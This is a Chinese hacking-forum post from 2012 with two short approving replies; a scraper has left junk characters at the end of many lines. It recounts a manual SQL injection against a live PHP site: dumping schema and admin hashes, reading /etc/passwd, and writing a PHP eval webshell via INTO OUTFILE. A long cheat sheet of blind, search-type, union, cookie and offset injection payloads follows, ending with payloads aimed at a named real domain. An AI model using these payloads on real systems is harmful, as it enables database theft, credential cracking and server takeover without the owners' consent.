找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3492|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~  O% s6 _$ M" X' k  T! V
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
1 z, Q0 D6 j; U! ]/ x: L/ [我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。6 o9 l7 K& g8 o' e
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)4 B: y6 [6 A% |5 d1 M# a
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
4 \. Z  g" Y7 e2 p% X3 M这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:$ q* Q# ?" n- ~- W
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in, M  {9 E) }" M  [
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
& `9 K$ P, G7 P9 Q+ p                         ) h& l, ^2 h5 O6 E+ b* l/ T  Y
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,. F' P0 q5 E/ _2 p( c7 ~8 ?
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意! v6 o% U- g/ v# R# D% d* e: @& c
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息, F+ s+ V. L/ `6 a, u* }/ _- L
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
+ C$ G* O9 a; g: T/ ^& F有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,/ h, h4 e0 R* {8 e; D' ~( N
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。  H  R8 W; ~! G" p+ f
我就用的是第二个思路,
( M# \- }0 ^+ ?) j" s* _! V( Q提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  8 {' i8 I0 q9 ]* y4 `9 W4 |4 b- c
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,' h7 k/ v1 V6 q( g
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
3 u/ d. }* S. _+ w$ l, r8 Y6 w注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。6 B; w1 A5 I" C
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????  o' Z- g- D1 `: N
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....1 h( v' l- P6 s0 k' I
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
# c5 e5 l9 D* J, W然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell," e* B4 S" G4 B6 _% Q
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
7 a3 M# z' D$ j0 d下面是一些很普遍注入方式资料:
# }$ j" s! |7 m9 Y* c7 p7 _2 ]' C注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
( }7 B3 f6 z6 A% B拆半法) M$ Z3 o4 J6 Q; [7 Q- U: B
######################################5 {  k/ I: `* b& d# q9 I$ R4 Q( e
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
8 W" C: [% V3 f' v: Oand exists (select * from admin)" j# A, w* v( W  v, |% W
and exists(select id from admin)! p9 _( z. g4 c1 n1 S
and exists(select id from admin where id=1)
1 }5 Z* j" W" u( Zand exists(select id from admin where id>1)
* _5 E  k# W4 @# y然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
: q4 b- H+ m/ C  k7 @and exists (select username from admin)% O  ?5 z" [& I) f2 I
and exists (select password from admin)
4 c# y1 p7 l; N+ Tand exists (select id from admin where len(username)<10 and id=1)4 @# U% B2 R6 J+ B3 A. z5 o4 k
and exists (select id from admin where len(username)>5 and id=1)
  t% P9 V% i6 Z7 l4 C: }4 r* v9 t+ aand exists (select id from admin where len(username)=6 and id=1)' G* d, H+ m) Y" e; w
and exists (select id from admin where len(password)<10 and id=1)
  A! a. ?0 A4 H1 a* {# Cand exists (select id from admin where len(password)>5 and id=1)+ r2 X( y+ i& l
and exists (select id from admin where len(password)=7 and id=1): D! s+ I3 S) V2 D" j! S/ s
and (select top 1 asc(mid(username,1,1)) from admin)=97% H% {" R2 E. a% o0 n7 r
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。' \2 {' P5 ~) r* M
猜第二位把username,1,1改成username,2,1就可以了。
% Q7 i& [$ n& B7 z( N猜密码把username改成password就OK了
( v3 T% p+ j1 u7 a" L##################################################% D, C7 G) ]. U
搜索型注入
) M8 _8 G/ h" G! u2 e$ O* u##################################* J4 R' @. m8 `! l0 t
%' and 1=1 and '%'='. p5 L2 o; o9 M, P, ?
%' and exists (select * from admin) and '%'='2 M6 h+ L( g6 I$ `4 ~% C
%' and exists(select id from admin where id=1) and '%'='
# v# }' [1 a2 z4 i%' and exists (select id from admin where len(username)<10 and id=1) and '%'='8 t% s& _* C# s) o" j4 M0 U
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
8 K: l/ j- O* y3 Y# m7 d9 ]& ^/ x7 G%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='9 @1 L5 M. j" |: v1 @8 l
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
: f2 |$ T/ R; `3 t对于MSSQL数据库,后面可以吧 and '%'='换成--
; l  O9 P9 r  u3 \! d$ Z  ?还有一点搜索型注入也可以使用union语句。/ g( v  j: a0 p* `4 p9 V& V
########################################################
  E- S9 S& ?  Q$ T! g0 [联合查询。
7 @8 e% Z! H/ b" q$ j) A+ Q% Q$ Z#####################################6 _' [7 Q2 T4 x9 j1 x6 c- L
order by 10
- r5 h3 c6 d, _" O5 C; q9 Nand 1=2 union select 1,2,3,4,5,6,7,8,9,10
# G! r$ e4 u' Y4 iand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
3 B5 Q- o) s" W9 }7 Q0 tand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=17 \) b" I$ B2 ~+ a3 U
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)) C2 G  ?) c; L& z
###################################
4 E' O7 h0 Z) E; ]5 {cookie注入
3 J; G1 \( o. h###############################+ i; v% D# j1 W: J4 D
http://www.******.com/shownews.asp?id=127( x. r& |& _; n5 a' q, i
http://www.******.com/shownews.asp
) c: ], c( V  |% Y. x8 H% [alert(="id="+escape("127"));
! g4 n8 l* \" v# Nalert(="id="+escape("127 and 1=1"));
+ A& W; O# [% G' G  @& ]8 ^alert(="id="+escape("127 order by 10"));
5 L: M2 P  s( `! v# D5 @" A5 calert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 S0 |8 R5 ?0 O+ g2 ?7 }4 W0 Ealert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
% V+ ?% h( r3 l9 p3 ~5 n这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。7 |7 [  K9 R' E# f, Y4 s6 A) v
###################################
0 t0 T& G0 m4 w$ X5 c' I, d& g偏移注入. `3 @. [7 u! u. l
###########################################################
$ f- Q; M3 f* q1 |union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
- e$ n, H- H, r. J1 Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin7 Y, t, _- q6 Q. j$ `# {
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)  N/ @* Q4 m/ K& d+ ^3 \0 C
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)9 h2 }: h8 }* {: l/ F* d) f) Y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4 E! ^( y8 w& n/ u% Aunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
3 w2 ?# l  j, w/ h; Y: |. B& ounion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on2 ~9 w5 R7 s9 {4 m) ?4 d
a.id=d.id)# v3 Y3 w/ l! p8 V4 N, |  c3 k
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)7 `/ _# H. v, y# w6 ]
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) ) L4 @% c# C3 }: K9 {8 R: B8 F
  6 p) o1 l: ^2 {: ^+ S
============================================================================================================/ s* ^4 Z, j1 }- q5 ]6 e1 O# t' k
1.判断版本2 t9 W, b. l! [7 F, i5 T- l6 m
and ord(mid(version(),1,1))>51) P. }# h4 g8 T! v% i, G& y
返回正常,说明大于4.0版本,支持ounion查询8 C, m) R9 V! |! Q6 f. ^0 T
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解$ q2 E2 n+ Y4 L' c$ i
and 2=4 union select 1,2,3,4,5,6,7,8,9--- T# P/ L2 j! j$ T0 j3 {. j- c
3.查看数据库版本及当前用户,
, z) c* |5 b9 Q2 _9 vand 2=4 union select 1,user(),version(),4,5,6,7,8,9--' Z- J# q# b1 Z) @4 w4 n6 J8 }" A
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
4 [" b0 b  _% }3 h" h4.判断有没有写权限" y7 G, L: H% Y% T3 V! t
and (select count(*) from MySQL.user)>0-- & y; l2 p+ l% I3 g
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
5 Q6 c2 T7 }- S/ x) P用不了这个命令,就学习土耳其黑客手法,如下5 e; I3 l7 L% E0 S/ s; e
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
% y- e# {7 p' o6.爆表,爆库
, D/ f. P  D+ Q0 Mand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
* P0 J, J4 y; D3 B  I' X7.爆列名,爆表
% R- ?" U) }* h: \6 Xand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--, l- j6 |  F4 q# x. H0 o2 _1 J2 _! Y
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。9 Z# Y! b4 `4 o5 G6 ^7 K8 ?' C" i
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--* k7 \2 Z4 i. N! W6 {2 a9 j
9.爆字段内容
1 F& U% b% k* @6 Wand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--# n% _/ H/ D2 H2 a9 s
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表